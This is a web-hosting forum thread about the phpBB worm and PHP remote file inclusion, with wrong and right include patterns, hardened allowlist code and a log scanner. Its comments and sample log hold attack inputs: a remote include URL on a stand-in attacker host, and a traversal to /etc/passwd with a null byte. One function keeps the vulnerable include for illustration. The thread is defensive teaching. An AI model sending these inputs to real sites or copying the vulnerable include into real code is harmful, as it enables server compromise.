phpBB Warning
Surpass Web Hosting Forums, Discussions / All Things Techy / Site Maintenance (program updates, securing your website, creating backups)
December 28th, 2004, 3:03 PM   #46
H wrote:
Ok, I read through the sites, and it seems that it's really nothing new. It's all to do with the security of include and require. What it does is use dynamic includes (or requires) to execute a remote script, infecting your site and the server.

Prevention for user made scripts:
Validate URL variables.

I had prevented this in the very beginning by putting includes in a subfolder, then checking to see if the file exists. And since http://scriptkiddies.org/evilscript.php can't exist in a subfolder on my site, no way for it to execute.

Prevention for third party made scripts:
Update to the latest versions and keep tabs on their sites for any further updates.

As big applications like this are used by hundreds, or even thousands of people, they're the big targets. Update them as soon as possible.


If I seem to have misinterpreted the prevention or cause, please let the community know of the appropriate action to take to prevent this.
December 28th, 2004, 4:53 PM   #47
David wrote:
Haugland... can you explain that a little more simply, please? Being PHP stupid, it sort of went over my head a bit, lol. Basically, can you give an example of "wrong" and "right"?
December 28th, 2004, 5:17 PM   #48
H wrote:
Sure thing, I guess I didn't think about whether people would understand or not.

WRONG
Code:
include("$p");   // $p comes straight from the request: any local path or remote URL gets included
RIGHT
Code:
include("somefolder/$p.php");   // the folder prefix and the .php suffix are fixed; only $p comes from the request
And of course, using a SWITCH method is always great too.

Code:
switch ($p) {
case "apple":
   include("apple.php");
   break;
case "bar":
   include("bar.php");
   break;
default:
   // any other value of $p includes nothing
   break;
}
More SWITCH info at http://ca3.php.net/switch
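The two includes from the post above, side by side with hardened versions, as an added example in PHP that is not code from the original post. The folder name `pages/`, the page names and the `resolve_page*` functions are assumptions for the example, and it is written against current PHP (7 and later) rather than the PHP 4 of the thread. The caveat a reviewer would add to the "RIGHT" line: a fixed folder prefix and `.php` suffix do stop a remote URL from being included, but `?p=../../something` still walks out of the folder, and on PHP releases before 5.3.4 a `%00` in `$p` truncated the path and discarded the `.php` suffix. The hardened versions below use an allowlist (the post's switch, in data form, plus the file-exists check from post #46) or a canonical-path containment check.

```php
<?php
// Added example, not from the original post. Assumes the includable pages
// live in a "pages/" subfolder next to this script (hypothetical layout).
declare(strict_types=1);

// Vulnerable: $p comes straight from the query string. With remote includes
// enabled (allow_url_fopen on PHP 4/5.1, allow_url_include from PHP 5.2),
// ?p=http://attacker.example/evil.txt fetches and executes remote code;
// with them disabled, ?p=../../../etc/passwd still reads local files.
function include_page_vulnerable(string $p): void
{
    include($p);
}

// The "RIGHT" line from the post. A remote URL can no longer be included,
// but ?p=../../config still leaves the folder, and on PHP < 5.3.4
// ?p=../../etc/passwd%00 truncated the string so ".php" was never appended.
function include_page_prefixed(string $p): void
{
    include("pages/$p.php");
}

// Hardened, option 1: an allowlist. The request can only select among the
// pages the developer chose to expose (the post's switch, as data).
const ALLOWED_PAGES = ['apple', 'bar', 'home'];   // hypothetical page names

function resolve_page(string $p): ?string
{
    if (!in_array($p, ALLOWED_PAGES, true)) {
        return null;
    }
    $path = __DIR__ . "/pages/$p.php";
    return is_file($path) ? $path : null;   // the file-exists check from post #46
}

// Hardened, option 2: when the page list is not known in advance, accept a
// conservative character set only, then confirm the canonical path (symlinks
// and ".." resolved) is still inside the pages directory.
function resolve_page_contained(string $p): ?string
{
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $p)) {
        return null;
    }
    $base = realpath(__DIR__ . '/pages');
    $path = realpath(__DIR__ . "/pages/$p.php");   // false if the file does not exist
    if ($base === false || $path === false) {
        return null;
    }
    // Compare with a trailing separator so "pages_private/x.php" cannot pass as "pages/..."
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$p = $_GET['p'] ?? 'home';
$file = resolve_page($p);
if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $file;
```

Option 1 is the one to prefer: the request selects an entry from a list the developer wrote, so no string from the client is ever joined into a path. Option 2 is for the case where pages are dropped into the folder without a code change; the character-class check does the real work, and the `realpath` comparison is the belt to its braces.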
December 28th, 2004, 5:48 PM   #49
David wrote:
Ah, that's cool. I get it now. It's probably not that "people" wouldn't understand... just me, lol. I just woke up about an hour ago, so my brain is still getting started.

Is it just variables like that? Or could it end up being included files as well?
December 28th, 2004, 5:55 PM   #50
H wrote:
Yeah, the whole tired thing is something we can all share.

I think it's just variables.
Like if you do
Code:
include("connect.php");
There's no way it could be manipulated.

Fortunately when I did teaching, I told the kids to use a subfolder. Who knows if they actually listened though.

Anyhow, if a real PHP expert could let us know any additional information, that would be great.
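The thread describes the attack as a dynamic include pointed at a remote script. From the server side, such attempts show up in the access log as request parameters carrying a URL, a `../` traversal or an encoded null byte. The following PHP scanner is an added example, not code from the original thread or from phpBB, that walks Apache-style combined-log lines and reports the parameters that match those patterns. The log lines, IP addresses, host names and parameter names are constructed for the example.

```php
<?php
// Added example, not from the original thread. Flags access-log requests
// whose query parameters look like remote-file-inclusion or traversal attempts.
declare(strict_types=1);

// Constructed sample log (Apache common log format); addresses and hosts are made up.
const SAMPLE_LOG = <<<'LOG'
198.51.100.7 - - [28/Dec/2004:15:03:11 -0800] "GET /index.php?p=apple HTTP/1.1" 200 1532
198.51.100.9 - - [28/Dec/2004:15:04:02 -0800] "GET /index.php?p=http://scriptkiddies.org/evilscript.php HTTP/1.1" 200 88
203.0.113.4 - - [28/Dec/2004:15:05:40 -0800] "GET /index.php?p=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 1201
203.0.113.5 - - [28/Dec/2004:15:06:13 -0800] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 9000
LOG;

// Returns the reasons one request path looks like an inclusion attack,
// or an empty array when nothing in its query string raises a flag.
function inclusion_flags(string $url): array
{
    $qpos = strpos($url, '?');
    if ($qpos === false) {
        return [];
    }
    $flags = [];
    foreach (explode('&', substr($url, $qpos + 1)) as $pair) {
        [$name, $value] = array_pad(explode('=', $pair, 2), 2, '');
        $decoded = rawurldecode($value);          // %2F -> "/", %00 -> NUL
        // A remote URL or PHP stream wrapper where a file name was expected.
        if (preg_match('#\A\s*(https?|ftp|php|data)://#i', $decoded)) {
            $flags[] = "$name: remote URL or stream wrapper";
        }
        // A ".." path component, with either slash direction.
        if (preg_match('#(\A|[/\\\\])\.\.([/\\\\]|\z)#', $decoded)) {
            $flags[] = "$name: directory traversal";
        }
        // A null byte, used to cut off a suffix such as ".php" on old PHP.
        if (strpos($decoded, "\0") !== false) {
            $flags[] = "$name: embedded null byte";
        }
    }
    return $flags;
}

// Parses each log line, keeps the ones that raise a flag.
function scan_log(string $log): array
{
    $hits = [];
    foreach (explode("\n", trim($log)) as $line) {
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"/', $line, $m)) {
            continue;   // not a log line we understand
        }
        $flags = inclusion_flags($m[4]);
        if ($flags !== []) {
            $hits[] = ['ip' => $m[1], 'time' => $m[2], 'url' => $m[4], 'flags' => $flags];
        }
    }
    return $hits;
}

foreach (scan_log(SAMPLE_LOG) as $hit) {
    printf("%s %s %s\n  %s\n", $hit['time'], $hit['ip'], $hit['url'], implode('; ', $hit['flags']));
}
```

On the sample above the first and last lines pass, the second is flagged for the remote URL in `p`, and the third for both the traversal and the null byte. Decoding the value before matching matters: the attacker sends `%2F` and `%00`, and a pattern applied to the raw line would miss both.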
January 21st, 2005, 5:25 PM   #51
Ravn_wolf wrote:
I'm dying here! Ok, I really can't update my phpBB right now. I have like no time. Plus, I'm in a very panicky mode because I've never updated the thing, and I'm afraid I'm going to mess up on the first try. Trust me, I'm an expert on that.

But I found this topic about the matter:
http://www.phpbb.com/phpBB/viewtopic.php?t=240513

Will it be enough for now?
January 22nd, 2005, 10:19 AM   #52
Einstein wrote:
Quote:
Originally Posted by Ravn_wolf
But I found this topic about the matter:
http://www.phpbb.com/phpBB/viewtopic.php?t=240513

Will it be enough for now?
Yes, it's enough to keep the worm out of your board. It's exactly that exploit it's using.
January 22nd, 2005, 6:11 PM   #53
Ravn_wolf wrote:
Thanks!
I already upgraded the boards anyway. I was afraid I was not going to have enough time to do it next week. And since my paranoia was gone, I was able to remember that I could upgrade the forums not just manually *applause*.

Anyway, thanks for telling me that this was enough to keep the worm out. I was arguing before with two of my users. They were telling everyone that the boards were unsafe because I wasn't upgrading the forums. I told them what I did with the script, and they didn't seem to believe it.
Now I think they just wanted to cause mayhem.
March 4th, 2005, 12:38 PM   #54
Partsking wrote:
All phpBB Admins should upgrade to the latest version, 2.0.13. It has a nice little feature in your admin panel that will check your current version and tell you if there's an update. It also fixes a critical issue in .12.

As always, keep your version updated!